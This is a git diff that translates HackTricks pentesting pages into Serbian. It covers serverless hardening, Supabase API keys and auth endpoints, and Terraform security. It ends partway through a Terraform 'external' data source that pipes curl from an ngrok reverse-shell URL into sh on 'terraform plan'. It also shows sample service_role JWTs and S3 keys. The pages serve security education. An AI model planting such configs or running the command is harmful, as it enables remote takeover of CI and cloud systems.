-    apiGateway:
-      throttle:
-        burstLimit: 200
-        rateLimit: 100
-  ```
+```yaml
+provider:
+apiGateway:
+throttle:
+burstLimit: 200
+rateLimit: 100
+```
 
-- **Secure CORS Configuration:** Restrict allowed origins, methods, and headers.
+- **Sigurna CORS Konfiguracija:** Ograničite dozvoljene izvore, metode i zaglavlja.
 
-  ```yaml
-  functions:
-    hello:
-      handler: handler.hello
-      events:
-        - http:
-            path: hello
-            method: get
-            cors:
-              origin: https://yourdomain.com
-              headers:
-                - Content-Type
-  ```
+```yaml
+functions:
+hello:
+handler: handler.hello
+events:
+- http:
+path: hello
+method: get
+cors:
+origin: https://yourdomain.com
+headers:
+- Content-Type
+```
 
-- **Use Web Application Firewalls (WAF):** Filter and monitor HTTP requests for malicious patterns.
+- **Koristite Vatrozide za Web Aplikacije (WAF):** Filtrirajte i pratite HTTP zahteve za zlonamernim obrascima.
 
 ---
 
-### **Insufficient Function Isolation**
+### **Nedovoljna Izolacija Funkcija**
 
-Shared resources and inadequate isolation can lead to privilege escalations or unintended interactions between functions.
+Deljeni resursi i nedovoljna izolacija mogu dovesti do eskalacije privilegija ili nenamernih interakcija između funkcija.
 
-#### **Mitigation Strategies**
+#### **Strategije ublažavanja**
 
-- **Isolate Functions:** Assign distinct resources and IAM roles to ensure independent operation.
-- **Resource Partitioning:** Use separate databases or storage buckets for different functions.
-- **Use VPCs:** Deploy functions within Virtual Private Clouds for enhanced network isolation.
+- **Izolujte Funkcije:** Dodelite različite resurse i IAM uloge kako biste osigurali nezavisno delovanje.
+- **Particionisanje Resursa:** Koristite odvojene baze podataka ili skladišne kante za različite funkcije.
+- **Koristite VPC-e:** Implementirajte funkcije unutar Virtuelnih Privatnih Oblaka za poboljšanu mrežnu izolaciju.
 
-  ```yaml
-  provider:
-    vpc:
-      securityGroupIds:
-        - sg-xxxxxxxx
-      subnetIds:
-        - subnet-xxxxxx
-  ```
+```yaml
+provider:
+vpc:
+securityGroupIds:
+- sg-xxxxxxxx
+subnetIds:
+- subnet-xxxxxx
+```
 
-- **Limit Function Permissions:** Ensure functions cannot access or interfere with each other’s resources unless explicitly required.
+- **Ograničite Dozvole Funkcija:** Osigurajte da funkcije ne mogu pristupiti ili ometati resurse jedne druge osim ako to nije izričito potrebno.
 
 ---
 
-### **Inadequate Data Protection**
+### **Nedovoljna Zaštita Podataka**
 
-Unencrypted data at rest or in transit can be exposed, leading to data breaches or tampering.
+Nešifrovani podaci u mirovanju ili u tranzitu mogu biti izloženi, što može dovesti do curenja podataka ili manipulacije.
 
-#### **Mitigation Strategies**
+#### **Strategije ublažavanja**
 
-- **Encrypt Data at Rest:** Utilize cloud service encryption features.
+- **Šifrujte Podatke u Mirovanju:** Iskoristite funkcije šifrovanja usluga u oblaku.
 
-  ```yaml
-  resources:
-    Resources:
-      MyDynamoDBTable:
-        Type: AWS::DynamoDB::Table
-        Properties:
-          SSESpecification:
-            SSEEnabled: true
-  ```
+```yaml
+resources:
+Resources:
+MyDynamoDBTable:
+Type: AWS::DynamoDB::Table
+Properties:
+SSESpecification:
+SSEEnabled: true
+```
 
-- **Encrypt Data in Transit:** Use HTTPS/TLS for all data transmissions.
-- **Secure API Communication:** Enforce encryption protocols and validate certificates.
-- **Manage Encryption Keys Securely:** Use managed key services and rotate keys regularly.
+- **Šifrujte Podatke u Tranzitu:** Koristite HTTPS/TLS za sve prenose podataka.
+- **Osigurajte API Komunikaciju:** Sprovodite protokole šifrovanja i validirajte sertifikate.
+- **Sigurno Upravljanje Ključevima za Šifrovanje:** Koristite upravljane usluge ključeva i redovno rotirajte ključeve.
 
 ---
 
-### **Lack of Proper Error Handling**
+### **Nedostatak Pravilnog Rukovanja Greškama**
 
-Detailed error messages can leak sensitive information about the infrastructure or codebase, while unhandled exceptions may lead to application crashes.
+Detaljne poruke o greškama mogu otkriti osetljive informacije o infrastrukturi ili bazi koda, dok neobrađene izuzetke mogu dovesti do rušenja aplikacije.
 
-#### **Mitigation Strategies**
+#### **Strategije ublažavanja**
 
-- **Generic Error Messages:** Avoid exposing internal details in error responses.
+- **Generičke Poruke o Greškama:** Izbegavajte izlaganje internih detalja u odgovorima na greške.
 
-  ```javascript
-  javascriptCopy code// Example in Node.js
-  exports.hello = async (event) => {
-    try {
-      // Function logic
-    } catch (error) {
-      console.error(error);
-      return {
-        statusCode: 500,
-        body: JSON.stringify({ message: 'Internal Server Error' }),
-      };
-    }
-  };
-  ```
+```javascript
+javascriptCopy code// Primer u Node.js
+exports.hello = async (event) => {
+try {
+// Logika funkcije
+} catch (error) {
+console.error(error);
+return {
+statusCode: 500,
+body: JSON.stringify({ message: 'Interna Greška Servera' }),
+};
+}
+};
+```
 
-- **Centralized Error Handling:** Manage and sanitize errors consistently across all functions.
-- **Monitor and Log Errors:** Track and analyze errors internally without exposing details to end-users.
+- **Centralizovano Rukovanje Greškama:** Upravljajte i sanitizujte greške dosledno kroz sve funkcije.
+- **Pratite i Logujte Greške:** Pratite i analizirajte greške interno bez izlaganja detalja krajnjim korisnicima.
 
 ---
 
-### **Insecure Deployment Practices**
+### **Neosigurane Prakse Implementacije**
 
-Exposed deployment configurations or unauthorized access to CI/CD pipelines can lead to malicious code deployments or misconfigurations.
+Izložene konfiguracije implementacije ili neovlašćen pristup CI/CD cevovodima mogu dovesti do zlonamernih implementacija koda ili pogrešnih konfiguracija.
 
-#### **Mitigation Strategies**
+#### **Strategije ublažavanja**
 
-- **Secure CI/CD Pipelines:** Implement strict access controls, multi-factor authentication (MFA), and regular audits.
-- **Store Configuration Securely:** Keep deployment files free from hardcoded secrets and sensitive data.
-- **Use Infrastructure as Code (IaC) Security Tools:** Employ tools like **Checkov** or **Terraform Sentinel** to enforce security policies.
-- **Immutable Deployments:** Prevent unauthorized changes post-deployment by adopting immutable infrastructure practices.
+- **Osigurajte CI/CD Cevovode:** Implementirajte stroge kontrole pristupa, višefaktorsku autentifikaciju (MFA) i redovne revizije.
+- **Sigurno Čuvanje Konfiguracije:** Držite datoteke za implementaciju bez hardkodiranih tajni i osetljivih podataka.
+- **Koristite Alate za Bezbednost Infrastrukture kao Koda (IaC):** Koristite alate kao što su **Checkov** ili **Terraform Sentinel** za sprovođenje sigurnosnih politika.
+- **Neizmenljive Implementacije:** Sprečite neovlašćene promene nakon implementacije usvajanjem praksi neizmenljive infrastrukture.
 
 ---
 
-### **Vulnerabilities in Plugins and Extensions**
+### **Ranjivosti u Plugin-ima i Ekstenzijama**
 
-Using unvetted or malicious third-party plugins can introduce vulnerabilities into your serverless applications.
+Korišćenje neproverenih ili zlonamernih trećih strana plugin-a može uvesti ranjivosti u vaše serverless aplikacije.
 
-#### **Mitigation Strategies**
+#### **Strategije ublažavanja**
 
-- **Vet Plugins Thoroughly:** Assess the security of plugins before integration, favoring those from reputable sources.
-- **Limit Plugin Usage:** Use only necessary plugins to minimize the attack surface.
-- **Monitor Plugin Updates:** Keep plugins updated to benefit from security patches.
-- **Isolate Plugin Environments:** Run plugins in isolated environments to contain potential compromises.
+- **Temeljno Proverite Plugin-e:** Procijenite sigurnost plugin-a pre integracije, favorizujući one iz uglednih izvora.
+- **Ograničite Korišćenje Plugin-a:** Koristite samo neophodne plugin-e kako biste smanjili površinu napada.
+- **Pratite Ažuriranja Plugin-a:** Držite plugin-e ažuriranim kako biste imali koristi od sigurnosnih zakrpa.
+- **Izolujte Okruženja Plugin-a:** Pokrećite plugin-e u izolovanim okruženjima kako biste sadržali potencijalne kompromitacije.
 
 ---
 
-### **Exposure of Sensitive Endpoints**
+### **Izloženost Osetljivim Krajnjim Tačkama**
 
-Publicly accessible functions or unrestricted APIs can be exploited for unauthorized operations.
+Javno dostupne funkcije ili neograničeni API-ji mogu se iskoristiti za neovlašćene operacije.
 
-#### **Mitigation Strategies**
+#### **Strategije ublažavanja**
 
-- **Restrict Function Access:** Use VPCs, security groups, and firewall rules to limit access to trusted sources.
-- **Implement Robust Authentication:** Ensure all exposed endpoints require proper authentication and authorization.
-- **Use API Gateways Securely:** Configure API Gateways to enforce security policies, including input validation and rate limiting.
-- **Disable Unused Endpoints:** Regularly review and disable any endpoints that are no longer in use.
+- **Ograničite Pristup Funkcijama:** Koristite VPC-e, sigurnosne grupe i pravila vatrozida kako biste ograničili pristup pouzdanim izvorima.
+- **Implementirajte Robusnu Autentifikaciju:** Osigurajte da sve izložene krajnje tačke zahtevaju pravilnu autentifikaciju i autorizaciju.
+- **Sigurno Koristite API Gateway-e:** Konfigurišite API Gateway-e da sprovode sigurnosne politike, uključujući validaciju ulaza i ograničavanje brzine.
+- **Onemogućite Neiskorišćene Krajnje Tačke:** Redovno pregledajte i onemogućite sve krajnje tačke koje više nisu u upotrebi.
 
 ---
 
-### **Excessive Permissions for Team Members and External Collaborators**
+### **Prekomerne Dozvole za Članove Tima i Spoljne Saradnike**
 
-Granting excessive permissions to team members and external collaborators can lead to unauthorized access, data breaches, and misuse of resources. This risk is heightened in environments where multiple individuals have varying levels of access, increasing the attack surface and potential for insider threats.
+Dodeljivanje prekomernih dozvola članovima tima i spoljnim saradnicima može dovesti do neovlašćenog pristupa, curenja podataka i zloupotrebe resursa. Ovaj rizik se povećava u okruženjima gde više pojedinaca ima različite nivoe pristupa, povećavajući površinu napada i potencijal za unutrašnje pretnje.
 
-#### **Mitigation Strategies**
+#### **Strategije ublažavanja**
 
-- **Principle of Least Privilege:** Ensure that team members and collaborators have only the permissions necessary to perform their tasks.
+- **Princip Najmanjih Privilegija:** Osigurajte da članovi tima i saradnici imaju samo one dozvole koje su neophodne za obavljanje njihovih zadataka.
 
 ---
 
-### **Access Keys and License Keys Security**
+### **Bezbednost Pristupnih Ključeva i Ključeva Licenci**
 
-**Access Keys** and **License Keys** are critical credentials used to authenticate and authorize interactions with the Serverless Framework CLI.
+**Pristupni Ključevi** i **Ključevi Licenci** su kritične akreditive koji se koriste za autentifikaciju i autorizaciju interakcija sa Serverless Framework CLI.
 
-- **License Keys:** They are Unique identifiers required for authenticating access to Serverless Framework Version 4 which allows to login via CLI.
-- **Access Keys:** Credentials that allow the Serverless Framework CLI to authenticate with the Serverless Framework Dashboard. When login with `serverless` cli an access key will be **generated and stored in the laptop**. You can also set it as an environment variable named `SERVERLESS_ACCESS_KEY`.
+- **Ključevi Licenci:** Oni su jedinstveni identifikatori potrebni za autentifikaciju pristupa Serverless Framework verziji 4 koja omogućava prijavu putem CLI.
+- **Pristupni Ključevi:** Akreditive koje omogućavaju Serverless Framework CLI da se autentifikuje sa Serverless Framework Dashboard-om. Kada se prijavite sa `serverless` cli, pristupni ključ će biti **generisan i sačuvan na laptopu**. Takođe ga možete postaviti kao promenljivu okruženja pod imenom `SERVERLESS_ACCESS_KEY`.
 
-#### **Security Risks**
+#### **Sigurnosni Rizici**
 
-1. **Exposure Through Code Repositories:**
-   - Hardcoding or accidentally committing Access Keys and License Keys to version control systems can lead to unauthorized access.
-2. **Insecure Storage:**
-   - Storing keys in plaintext within environment variables or configuration files without proper encryption increases the likelihood of leakage.
-3. **Improper Distribution:**
-   - Sharing keys through unsecured channels (e.g., email, chat) can result in interception by malicious actors.
-4. **Lack of Rotation:**
-   - Not regularly rotating keys extends the exposure period if keys are compromised.
-5. **Excessive Permissions:**
-   - Keys with broad permissions can be exploited to perform unauthorized actions across multiple resources.
+1. **Izloženost Kroz Repozitorijume Koda:**
+- Hardkodiranje ili slučajno komitovanje pristupnih ključeva i ključeva licenci u sisteme za kontrolu verzija može dovesti do neovlašćenog pristupa.
+2. **Nesigurno Čuvanje:**
+- Čuvanje ključeva u čistom tekstu unutar promenljivih okruženja ili konfiguracionih datoteka bez odgovarajuće enkripcije povećava verovatnoću curenja.
+3. **Nepravilna Distribucija:**
+- Deljenje ključeva putem nesigurnih kanala (npr. e-pošta, chat) može rezultirati presretanjem od strane zlonamernih aktera.
+4. **Nedostatak Rotacije:**
+- Nepostojanje redovne rotacije ključeva produžava period izloženosti ako su ključevi kompromitovani.
+5. **Prekomerne Dozvole:**
+- Ključevi sa širokim dozvolama mogu se iskoristiti za obavljanje neovlašćenih radnji širom više resursa.
 
 {{#include ../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/supabase-security.md b/src/pentesting-ci-cd/supabase-security.md
index 6fa6219f8..4eab43410 100644
--- a/src/pentesting-ci-cd/supabase-security.md
+++ b/src/pentesting-ci-cd/supabase-security.md
@@ -4,47 +4,46 @@
 
 ## Basic Information
 
-As per their [**landing page**](https://supabase.com/): Supabase is an open source Firebase alternative. Start your project with a Postgres database, Authentication, instant APIs, Edge Functions, Realtime subscriptions, Storage, and Vector embeddings.
+Prema njihovoj [**landing stranici**](https://supabase.com/): Supabase je open source alternativa za Firebase. Započnite svoj projekat sa Postgres bazom podataka, autentifikacijom, instant API-ima, Edge funkcijama, Realtime pretplatama, skladištem i vektorskim ugradnjama.
 
-### Subdomain
+### Subdomen
 
-Basically when a project is created, the user will receive a supabase.co subdomain like: **`jnanozjdybtpqgcwhdiz.supabase.co`**
+U suštini, kada se projekat kreira, korisnik će dobiti supabase.co subdomen kao: **`jnanozjdybtpqgcwhdiz.supabase.co`**
 
-## **Database configuration**
+## **Konfiguracija baze podataka**
 
 > [!TIP]
-> **This data can be accessed from a link like `https://supabase.com/dashboard/project//settings/database`**
+> **Ovi podaci se mogu pristupiti putem linka kao što je `https://supabase.com/dashboard/project//settings/database`**
 
-This **database** will be deployed in some AWS region, and in order to connect to it it would be possible to do so connecting to: `postgres://postgres.jnanozjdybtpqgcwhdiz:[YOUR-PASSWORD]@aws-0-us-west-1.pooler.supabase.com:5432/postgres` (this was crated in us-west-1).\
-The password is a **password the user put** previously.
+Ova **baza podataka** će biti postavljena u nekoj AWS regiji, i da bi se povezali na nju, moguće je to učiniti povezivanjem na: `postgres://postgres.jnanozjdybtpqgcwhdiz:[YOUR-PASSWORD]@aws-0-us-west-1.pooler.supabase.com:5432/postgres` (ova je kreirana u us-west-1).\
+Lozinka je **lozinka koju je korisnik prethodno postavio**.
 
-Therefore, as the subdomain is a known one and it's used as username and the AWS regions are limited, it might be possible to try to **brute force the password**.
+Stoga, pošto je subdomen poznat i koristi se kao korisničko ime, a AWS regije su ograničene, može biti moguće pokušati da **brute force-ujete lozinku**.
 
-This section also contains options to:
+Ovaj odeljak takođe sadrži opcije za:
 
-- Reset the database password
-- Configure connection pooling
-- Configure SSL: Reject plan-text connections (by default they are enabled)
-- Configure Disk size
-- Apply network restrictions and bans
+- Resetovanje lozinke baze podataka
+- Konfiguraciju povezivanja
+- Konfiguraciju SSL: Odbijanje plan-text konekcija (po defaultu su omogućene)
+- Konfiguraciju veličine diska
+- Primenu mrežnih ograničenja i zabrana
 
-## API Configuration
+## Konfiguracija API-ja
 
 > [!TIP]
-> **This data can be accessed from a link like `https://supabase.com/dashboard/project//settings/api`**
+> **Ovi podaci se mogu pristupiti putem linka kao što je `https://supabase.com/dashboard/project//settings/api`**
 
-The URL to access the supabase API in your project is going to be like: `https://jnanozjdybtpqgcwhdiz.supabase.co`.
+URL za pristup supabase API-ju u vašem projektu biće: `https://jnanozjdybtpqgcwhdiz.supabase.co`.
 
-### anon api keys
+### anon api ključevi
 
-It'll also generate an **anon API key** (`role: "anon"`), like: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk` that the application will need to use in order to contact the API key exposed in our example in
+Takođe će generisati **anon API ključ** (`role: "anon"`), kao: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk` koji će aplikacija morati da koristi da bi kontaktirala API ključ izložen u našem primeru u
 
-It's possible to find the API REST to contact this API in the [**docs**](https://supabase.com/docs/reference/self-hosting-auth/returns-the-configuration-settings-for-the-gotrue-server), but the most interesting endpoints would be:
+Moguće je pronaći API REST za kontaktiranje ovog API-ja u [**docs**](https://supabase.com/docs/reference/self-hosting-auth/returns-the-configuration-settings-for-the-gotrue-server), ali najzanimljiviji endpointi bi bili:
 
 

 
 Signup (/auth/v1/signup)
-
 ```
 POST /auth/v1/signup HTTP/2
 Host: id.io.net
@@ -69,13 +68,11 @@ Priority: u=1, i
 
 {"email":"test@exmaple.com","password":"SomeCOmplexPwd239."}
 ```
-
 

 
 

 
-Login (/auth/v1/token?grant_type=password)
-
+Prijava (/auth/v1/token?grant_type=password)
 ```
 POST /auth/v1/token?grant_type=password HTTP/2
 Host: hypzbtgspjkludjcnjxl.supabase.co
@@ -100,68 +97,63 @@ Priority: u=1, i
 
 {"email":"test@exmaple.com","password":"SomeCOmplexPwd239."}
 ```
-
 

 
-So, whenever you discover a client using supabase with the subdomain they were granted (it's possible that a subdomain of the company has a CNAME over their supabase subdomain), you might try to **create a new account in the platform using the supabase API**.
+Dakle, kada otkrijete klijenta koji koristi supabase sa poddomenom koja im je dodeljena (moguće je da poddomena kompanije ima CNAME preko njihove supabase poddomene), možete pokušati da **napravite novi nalog na platformi koristeći supabase API**.
 
-### secret / service_role api keys
+### tajni / service_role api ključevi
 
-A secret API key will also be generated with **`role: "service_role"`**. This API key should be secret because it will be able to bypass **Row Level Security**.
+Tajni API ključ će takođe biti generisan sa **`role: "service_role"`**. Ovaj API ključ treba da bude tajan jer će moći da zaobiđe **Row Level Security**.
 
-The API key looks like this: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6InNlcnZpY2Vfcm9sZSIsImlhdCI6MTcxNDk5MjcxOSwiZXhwIjoyMDMwNTY4NzE5fQ.0a8fHGp3N_GiPq0y0dwfs06ywd-zhTwsm486Tha7354`
+API ključ izgleda ovako: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6InNlcnZpY2Vfcm9sZSIsImlhdCI6MTcxNDk5MjcxOSwiZXhwIjoyMDMwNTY4NzE5fQ.0a8fHGp3N_GiPq0y0dwfs06ywd-zhTwsm486Tha7354`
 
-### JWT Secret
+### JWT Tajna
 
-A **JWT Secret** will also be generate so the application can **create and sign custom JWT tokens**.
+**JWT Tajna** će takođe biti generisana kako bi aplikacija mogla da **kreira i potpisuje prilagođene JWT tokene**.
 
-## Authentication
+## Autentifikacija
 
-### Signups
+### Registracije
 
 > [!TIP]
-> By **default** supabase will allow **new users to create accounts** on your project by using the previously mentioned API endpoints.
+> Po **defaultu** supabase će omogućiti **novim korisnicima da kreiraju naloge** na vašem projektu koristeći prethodno pomenute API krajnje tačke.
 
-However, these new accounts, by default, **will need to validate their email address** to be able to login into the account. It's possible to enable **"Allow anonymous sign-ins"** to allow people to login without verifying their email address. This could grant access to **unexpected data** (they get the roles `public` and `authenticated`).\
-This is a very bad idea because supabase charges per active user so people could create users and login and supabase will charge for those:
+Međutim, ovi novi nalozi, po defaultu, **će morati da verifikuju svoju email adresu** da bi mogli da se prijave na nalog. Moguće je omogućiti **"Dozvoli anonimne prijave"** kako bi ljudi mogli da se prijave bez verifikacije svoje email adrese. Ovo bi moglo omogućiti pristup **neočekivanim podacima** (dobijaju uloge `public` i `authenticated`).\
+Ovo je veoma loša ideja jer supabase naplaćuje po aktivnom korisniku, tako da bi ljudi mogli da kreiraju korisnike i prijave se, a supabase će naplatiti za njih:
 
 

 
-### Passwords & sessions
+### Lozinke i sesije
 
-It's possible to indicate the minimum password length (by default), requirements (no by default) and disallow to use leaked passwords.\
-It's recommended to **improve the requirements as the default ones are weak**.
+Moguće je odrediti minimalnu dužinu lozinke (po defaultu), zahteve (nema po defaultu) i zabraniti korišćenje provaljenih lozinki.\
+Preporučuje se da se **poboljšaju zahtevi jer su defaultni slabi**.
 
-- User Sessions: It's possible to configure how user sessions work (timeouts, 1 session per user...)
-- Bot and Abuse Protection: It's possible to enable Captcha.
+- Korisničke sesije: Moguće je konfigurisati kako funkcionišu korisničke sesije (timeouti, 1 sesija po korisniku...)
+- Zaštita od botova i zloupotrebe: Moguće je omogućiti Captcha.
 
-### SMTP Settings
+### SMTP Podešavanja
 
-It's possible to set an SMTP to send emails.
+Moguće je postaviti SMTP za slanje emailova.
 
-### Advanced Settings
+### Napredna Podešavanja
 
-- Set expire time to access tokens (3600 by default)
-- Set to detect and revoke potentially compromised refresh tokens and timeout
-- MFA: Indicate how many MFA factors can be enrolled at once per user (10 by default)
-- Max Direct Database Connections: Max number of connections used to auth (10 by default)
-- Max Request Duration: Maximum time allowed for an Auth request to last (10s by default)
+- Postaviti vreme isteka za pristupne tokene (3600 po defaultu)
+- Postaviti da detektuje i opozove potencijalno kompromitovane osvežavajuće tokene i timeout
+- MFA: Naznačiti koliko MFA faktora može biti registrovano odjednom po korisniku (10 po defaultu)
+- Maksimalne direktne veze sa bazom podataka: Maksimalan broj veza korišćenih za autentifikaciju (10 po defaultu)
+- Maksimalno trajanje zahteva: Maksimalno vreme dozvoljeno za trajanje Auth zahteva (10s po defaultu)
 
-## Storage
+## Skladištenje
 
 > [!TIP]
-> Supabase allows **to store files** and make them accesible over a URL (it uses S3 buckets).
+> Supabase omogućava **da se skladište fajlovi** i učine dostupnim preko URL-a (koristi S3 kante).
 
-- Set the upload file size limit (default is 50MB)
-- The S3 connection is given with a URL like: `https://jnanozjdybtpqgcwhdiz.supabase.co/storage/v1/s3`
-- It's possible to **request S3 access key** that are formed by an `access key ID` (e.g. `a37d96544d82ba90057e0e06131d0a7b`) and a `secret access key` (e.g. `58420818223133077c2cec6712a4f909aec93b4daeedae205aa8e30d5a860628`)
+- Postaviti limit veličine fajla za upload (default je 50MB)
+- S3 veza se daje sa URL-om kao: `https://jnanozjdybtpqgcwhdiz.supabase.co/storage/v1/s3`
+- Moguće je **zatražiti S3 pristupni ključ** koji se sastoji od `access key ID` (npr. `a37d96544d82ba90057e0e06131d0a7b`) i `secret access key` (npr. `58420818223133077c2cec6712a4f909aec93b4daeedae205aa8e30d5a860628`)
 
-## Edge Functions
+## Edge Funkcije
 
-It's possible to **store secrets** in supabase also which will be **accessible by edge functions** (the can be created and deleted from the web, but it's not possible to access their value directly).
+Moguće je **čuvati tajne** u supabase-u koje će biti **dostupne putem edge funkcija** (mogu se kreirati i brisati sa web-a, ali nije moguće direktno pristupiti njihovoj vrednosti).
 
 {{#include ../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/terraform-security.md b/src/pentesting-ci-cd/terraform-security.md
index 09b875ff2..4f975f4e0 100644
--- a/src/pentesting-ci-cd/terraform-security.md
+++ b/src/pentesting-ci-cd/terraform-security.md
@@ -2,307 +2,277 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-## Basic Information
+## Osnovne informacije
 
-[From the docs:](https://developer.hashicorp.com/terraform/intro)
+[Iz dokumenata:](https://developer.hashicorp.com/terraform/intro)
 
-HashiCorp Terraform is an **infrastructure as code tool** that lets you define both **cloud and on-prem resources** in human-readable configuration files that you can version, reuse, and share. You can then use a consistent workflow to provision and manage all of your infrastructure throughout its lifecycle. Terraform can manage low-level components like compute, storage, and networking resources, as well as high-level components like DNS entries and SaaS features.
+HashiCorp Terraform je **alat za infrastrukturu kao kod** koji vam omogućava da definišete kako **resurse u oblaku, tako i lokalne resurse** u konfiguracionim datotekama koje su čitljive za ljude, a koje možete verzionisati, ponovo koristiti i deliti. Zatim možete koristiti dosledan radni tok za obezbeđivanje i upravljanje svim vašim resursima tokom njihovog životnog ciklusa. Terraform može upravljati niskonivom komponentama kao što su resursi za računanje, skladištenje i umrežavanje, kao i visokim komponentama kao što su DNS unosi i SaaS funkcije.
 
-#### How does Terraform work?
+#### Kako Terraform funkcioniše?
 
-Terraform creates and manages resources on cloud platforms and other services through their application programming interfaces (APIs). Providers enable Terraform to work with virtually any platform or service with an accessible API.
+Terraform kreira i upravlja resursima na platformama u oblaku i drugim uslugama putem njihovih interfejsa za programiranje aplikacija (API). Provajderi omogućavaju Terraformu da radi sa praktično bilo kojom platformom ili uslugom koja ima dostupan API.
 
 ![](<../images/image (177).png>)
 
-HashiCorp and the Terraform community have already written **more than 1700 providers** to manage thousands of different types of resources and services, and this number continues to grow. You can find all publicly available providers on the [Terraform Registry](https://registry.terraform.io/), including Amazon Web Services (AWS), Azure, Google Cloud Platform (GCP), Kubernetes, Helm, GitHub, Splunk, DataDog, and many more.
+HashiCorp i Terraform zajednica su već napisali **više od 1700 provajdera** za upravljanje hiljadama različitih tipova resursa i usluga, a ovaj broj se i dalje povećava. Sve javno dostupne provajdere možete pronaći na [Terraform Registry](https://registry.terraform.io/), uključujući Amazon Web Services (AWS), Azure, Google Cloud Platform (GCP), Kubernetes, Helm, GitHub, Splunk, DataDog i mnoge druge.
 
-The core Terraform workflow consists of three stages:
+Osnovni Terraform radni tok se sastoji od tri faze:
 
-- **Write:** You define resources, which may be across multiple cloud providers and services. For example, you might create a configuration to deploy an application on virtual machines in a Virtual Private Cloud (VPC) network with security groups and a load balancer.
-- **Plan:** Terraform creates an execution plan describing the infrastructure it will create, update, or destroy based on the existing infrastructure and your configuration.
-- **Apply:** On approval, Terraform performs the proposed operations in the correct order, respecting any resource dependencies. For example, if you update the properties of a VPC and change the number of virtual machines in that VPC, Terraform will recreate the VPC before scaling the virtual machines.
+- **Pisanje:** Definišete resurse, koji mogu biti raspoređeni preko više provajdera i usluga u oblaku. Na primer, možete kreirati konfiguraciju za implementaciju aplikacije na virtuelnim mašinama u mreži Virtuelne Privatne Oblasti (VPC) sa sigurnosnim grupama i balansirnikom opterećenja.
+- **Planiranje:** Terraform kreira plan izvršenja koji opisuje infrastrukturu koju će kreirati, ažurirati ili uništiti na osnovu postojeće infrastrukture i vaše konfiguracije.
+- **Primena:** Nakon odobrenja, Terraform izvršava predložene operacije u ispravnom redosledu, poštujući sve zavisnosti resursa. Na primer, ako ažurirate svojstva VPC-a i promenite broj virtuelnih mašina u tom VPC-u, Terraform će ponovo kreirati VPC pre nego što skalira virtuelne mašine.
 
 ![](<../images/image (215).png>)
 
-### Terraform Lab
+### Terraform laboratorija
 
-Just install terraform in your computer.
+Samo instalirajte terraform na vašem računaru.
 
-Here you have a [guide](https://learn.hashicorp.com/tutorials/terraform/install-cli) and here you have the [best way to download terraform](https://www.terraform.io/downloads).
+Ovde imate [vodič](https://learn.hashicorp.com/tutorials/terraform/install-cli) i ovde imate [najbolji način za preuzimanje terraforma](https://www.terraform.io/downloads).
 
-## RCE in Terraform
+## RCE u Terraformu
 
-Terraform **doesn't have a platform exposing a web page or a network service** we can enumerate, therefore, the only way to compromise terraform is to **be able to add/modify terraform configuration files**.
+Terraform **nema platformu koja izlaže web stranicu ili mrežnu uslugu** koju možemo enumerisati, stoga je jedini način da se kompromituje terraform **može dodati/izmeniti terraform konfiguracione datoteke**.
 
-However, terraform is a **very sensitive component** to compromise because it will have **privileged access** to different locations so it can work properly.
+Međutim, terraform je **veoma osetljiva komponenta** za kompromitovanje jer će imati **privilegovan pristup** različitim lokacijama kako bi mogao pravilno da funkcioniše.
 
-The main way for an attacker to be able to compromise the system where terraform is running is to **compromise the repository that stores terraform configurations**, because at some point they are going to be **interpreted**.
+Glavni način na koji napadač može kompromitovati sistem na kojem se terraform izvršava je da **kompromituje repozitorijum koji čuva terraform konfiguracije**, jer će u nekom trenutku biti **interpretirane**.
 
-Actually, there are solutions out there that **execute terraform plan/apply automatically after a PR** is created, such as **Atlantis**:
+U stvari, postoje rešenja koja **automatski izvršavaju terraform plan/primenu nakon što je PR** kreiran, kao što je **Atlantis**:
 
 {{#ref}}
 atlantis-security.md
 {{#endref}}
 
-If you are able to compromise a terraform file there are different ways you can perform RCE when someone executed `terraform plan` or `terraform apply`.
+Ako ste u mogućnosti da kompromitujete terraform datoteku, postoje različiti načini na koje možete izvršiti RCE kada neko izvrši `terraform plan` ili `terraform apply`.
 
 ### Terraform plan
 
-Terraform plan is the **most used command** in terraform and developers/solutions using terraform call it all the time, so the **easiest way to get RCE** is to make sure you poison a terraform config file that will execute arbitrary commands in a `terraform plan`.
+Terraform plan je **najčešće korišćena komanda** u terraformu i programeri/rešenja koja koriste terraform je pozivaju stalno, tako da je **najlakši način da dobijete RCE** da se pobrinete da otrovate terraform konfiguracionu datoteku koja će izvršiti proizvoljne komande u `terraform plan`.
 
-**Using an external provider**
+**Korišćenje spoljnog provajdera**
 
-Terraform offers the [`external` provider](https://registry.terraform.io/providers/hashicorp/external/latest/docs) which provides a way to interface between Terraform and external programs. You can use the `external` data source to run arbitrary code during a `plan`.
-
-Injecting in a terraform config file something like the following will execute a rev shell when executing `terraform plan`:
+Terraform nudi [`external` provajder](https://registry.terraform.io/providers/hashicorp/external/latest/docs) koji pruža način za interakciju između Terraforma i spoljnjih programa. Možete koristiti `external` izvor podataka za izvršavanje proizvoljnog koda tokom `plana`.
 
+Umetanje u terraform konfiguracionu datoteku nešto poput sledećeg će izvršiti rev shell prilikom izvršavanja `terraform plan`:
 ```javascript
 data "external" "example" {
-  program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"]
